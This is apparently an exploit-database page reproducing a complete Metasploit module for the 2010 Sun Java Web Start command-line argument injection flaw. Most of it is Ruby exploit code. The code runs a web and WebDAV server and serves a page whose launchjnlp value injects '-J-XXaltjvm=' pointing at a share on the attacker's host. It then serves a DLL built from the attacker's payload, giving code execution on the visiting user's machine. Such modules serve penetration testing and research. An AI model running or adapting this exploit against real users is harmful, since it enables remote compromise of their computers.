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Sun Java Web Start Plugin Command Line Argument Injection

🗓️ 15 Apr 2010 00:00:00Reported by jduckType 
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Sun Java Web Start Plugin Command Line Argument Injection. This module exploits a flaw in the Web Start plugin component of Sun Java Web Start. The arguments passed to Java Web Start are not properly validated. By passing the -J option, an attacker can execute arbitrary code in the context of an unsuspecting browser user. This vulnerability was originally discovered independently by both Ruben Santamarta and Tavis Ormandy

Code
`##  
# $Id: java_ws_arginject_altvm.rb 9083 2010-04-15 15:23:43Z jduck $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
#  
# This module acts as an HTTP server  
#  
include Msf::Exploit::Remote::HttpServer::HTML  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Sun Java Web Start Plugin Command Line Argument Injection',  
'Description' => %q{  
This module exploits a flaw in the Web Start plugin component of Sun Java  
Web Start. The arguments passed to Java Web Start are not properly validated.  
By passing the lesser known -J option, an attacker can pass arbitrary options  
directly to the Java runtime. By utilizing the -XXaltjvm option, as discussed  
by Ruben Santamarta, an attacker can execute arbitrary code in the context of  
an unsuspecting browser user.  
  
This vulnerability was originally discovered independently by both Ruben   
Santamarta and Tavis Ormandy.  
  
Tavis reported that all versions since version 6 Update 10 "are believed to be  
affected by this vulnerability."  
},  
'License' => MSF_LICENSE,  
'Author' => 'jduck',  
'Version' => '$Revision: 9083 $',  
'References' =>  
[  
[ 'OSVDB', '63648' ],  
[ 'BID', '39346' ],  
[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2010-04/0122.html' ],  
[ 'URL', 'http://www.reversemode.com/index.php?option=com_content&task=view&id=67&Itemid=1' ]  
],  
'Platform' => 'win',  
'Payload' =>  
{  
'Space' => 1024,  
'BadChars' => '',  
'DisableNops' => true,  
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff"  
},  
'Targets' =>  
[  
[ 'Automatic', { } ],  
[ 'Java Runtime on Windows x86',  
{  
'Platform' => 'win',  
'Arch' => ARCH_X86  
}  
],  
],  
'DefaultTarget' => 0,  
'DisclosureDate' => 'Apr 09 2010'  
))  
  
register_options(  
[  
OptPort.new('SRVPORT', [ true, "The daemon port to listen on", 80 ]),  
OptString.new('URIPATH', [ true, "The URI to use.", "/" ])  
], self.class)  
end  
  
  
def auto_target(cli, request)  
agent = request.headers['User-Agent']  
  
ret = nil  
#print_status("Agent: #{agent}")  
# Check for MSIE and/or WebDAV redirector requests  
if agent =~ /(Windows NT (5|6)\.(0|1|2)|MiniRedir\/(5|6)\.(0|1|2))/  
ret = targets[1]  
elsif agent =~ /MSIE (6|7|8)\.0/  
ret = targets[1]  
else  
print_status("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")  
end  
  
ret  
end  
  
  
def on_request_uri(cli, request)  
  
# For this exploit, this does little besides ensures the user agent is a recognized one..  
mytarget = target  
if target.name == 'Automatic'  
mytarget = auto_target(cli, request)  
if (not mytarget)  
send_not_found(cli)  
return  
end  
end  
  
# Special case to process OPTIONS for /  
if (request.method == 'OPTIONS' and request.uri == '/')  
process_options(cli, request, mytarget)  
return  
end  
  
# Discard requests for ico files  
if (request.uri =~ /\.ico$/i)  
send_not_found(cli)  
return  
end  
  
# If there is no subdirectory in the request, we need to redirect.  
if (request.uri == '/') or not (request.uri =~ /\/([^\/]+)\//)  
if (request.uri == '/')  
subdir = '/' + rand_text_alphanumeric(8+rand(8)) + '/'  
else  
subdir = request.uri + '/'  
end  
print_status("Request for \"#{request.uri}\" does not contain a sub-directory, redirecting to #{subdir} ...")  
send_redirect(cli, subdir)  
return  
else  
share_name = $1  
end  
  
# dispatch WebDAV requests based on method first  
case request.method  
when 'OPTIONS'  
process_options(cli, request, mytarget)  
  
when 'PROPFIND'  
process_propfind(cli, request, mytarget)  
  
when 'GET'  
process_get(cli, request, mytarget, share_name)  
  
when 'PUT'  
print_status("Sending 404 for PUT #{request.uri} ...")  
send_not_found(cli)  
  
else  
print_error("Unexpected request method encountered: #{request.method}")  
  
end  
  
end  
  
#  
# GET requests  
#  
def process_get(cli, request, target, share_name)  
  
print_status("Responding to \"GET #{request.uri}\" request from #{cli.peerhost}:#{cli.peerport}")  
# dispatch based on extension  
if (request.uri =~ /\.dll$/i)  
#  
# DLL requests sent by IE and the WebDav Mini-Redirector  
#  
print_status("Sending DLL to #{cli.peerhost}:#{cli.peerport}...")  
  
# Re-generate the payload  
return if ((p = regenerate_payload(cli)) == nil)  
  
# Generate a DLL based on the payload  
dll_data = Msf::Util::EXE.to_win32pe_dll(framework, p.encoded)  
  
# Send it :)  
send_response(cli, dll_data, { 'Content-Type' => 'application/octet-stream' })  
  
else  
#  
# HTML requests sent by IE and Firefox  
#  
my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']  
  
print_status("Sending HTML to #{cli.peerhost}:#{cli.peerport}...")  
  
unc = "\\\\" + my_host + "\\" + share_name  
jnlp = "-J-XXaltjvm=" + unc + " " + rand_text_alphanumeric(8+rand(8)) + ".jnlp"  
docbase = ""  
  
html = %Q|<html>  
<body>  
<object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93"  
width="100%" height="100%">  
<PARAM name="launchjnlp" value="#{jnlp}">  
<PARAM name="docbase" value="#{docbase}">  
</object>  
<embed type="application/x-java-applet"  
width="0" height="0"  
launchjnlp="#{jnlp}"  
docbase="#{docbase}"  
/>  
</body>  
</html>  
|  
  
send_response_html(cli, html,  
{  
'Content-Type' => 'text/html',  
'Pragma' => 'no-cache'  
})  
end  
  
end  
  
#  
# OPTIONS requests sent by the WebDav Mini-Redirector  
#  
def process_options(cli, request, target)  
print_status("Responding to WebDAV \"OPTIONS #{request.uri}\" request from #{cli.peerhost}:#{cli.peerport}")  
headers = {  
#'DASL' => '<DAV:sql>',  
#'DAV' => '1, 2',  
'Allow' => 'OPTIONS, GET, PROPFIND',  
'Public' => 'OPTIONS, GET, PROPFIND'  
}  
send_response(cli, '', headers)  
end  
  
  
#  
# PROPFIND requests sent by the WebDav Mini-Redirector  
#  
def process_propfind(cli, request, target)  
path = request.uri  
print_status("Received WebDAV \"PROPFIND #{request.uri}\" request from #{cli.peerhost}:#{cli.peerport}")  
body = ''  
  
if (path =~ /\.dll$/i)  
# Response for the DLL  
print_status("Sending DLL multistatus for #{path} ...")  
#<lp1:getcontentlength>45056</lp1:getcontentlength>  
body = %Q|<?xml version="1.0" encoding="utf-8"?>  
<D:multistatus xmlns:D="DAV:">  
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">  
<D:href>#{path}</D:href>  
<D:propstat>  
<D:prop>  
<lp1:resourcetype/>  
<lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate>  
<lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified>  
<lp1:getetag>"39e0132-b000-43c6e5f8d2f80"</lp1:getetag>  
<lp2:executable>F</lp2:executable>  
<D:lockdiscovery/>  
<D:getcontenttype>application/octet-stream</D:getcontenttype>  
</D:prop>  
<D:status>HTTP/1.1 200 OK</D:status>  
</D:propstat>  
</D:response>  
</D:multistatus>  
|  
=begin  
# We don't have these things  
elsif (path =~ /\.manifest$/i) or (path =~ /\.config$/i) or (path =~ /\.exe/i)  
print_status("Sending 404 for #{path} ...")  
send_not_found(cli)  
return  
=end  
elsif (path =~ /\/$/) or (not path.sub('/', '').index('/'))  
# Response for anything else (generally just /)  
print_status("Sending directory multistatus for #{path} ...")  
body = %Q|<?xml version="1.0" encoding="utf-8"?>  
<D:multistatus xmlns:D="DAV:">  
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">  
<D:href>#{path}</D:href>  
<D:propstat>  
<D:prop>  
<lp1:resourcetype><D:collection/></lp1:resourcetype>  
<lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate>  
<lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified>  
<lp1:getetag>"39e0001-1000-4808c3ec95000"</lp1:getetag>  
<D:lockdiscovery/>  
<D:getcontenttype>httpd/unix-directory</D:getcontenttype>  
</D:prop>  
<D:status>HTTP/1.1 200 OK</D:status>  
</D:propstat>  
</D:response>  
</D:multistatus>  
|  
  
else  
print_status("Sending 404 for #{path} ...")  
send_not_found(cli)  
return  
  
end  
  
# send the response  
resp = create_response(207, "Multi-Status")  
resp.body = body  
resp['Content-Type'] = 'text/xml'  
cli.send_response(resp)  
end  
  
  
#  
# Make sure we're on the right port/path to support WebDAV  
#  
def exploit  
if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'  
raise RuntimeError, 'Using WebDAV requires SRVPORT=80 and URIPATH=/'  
end  
  
super  
end  
  
end  
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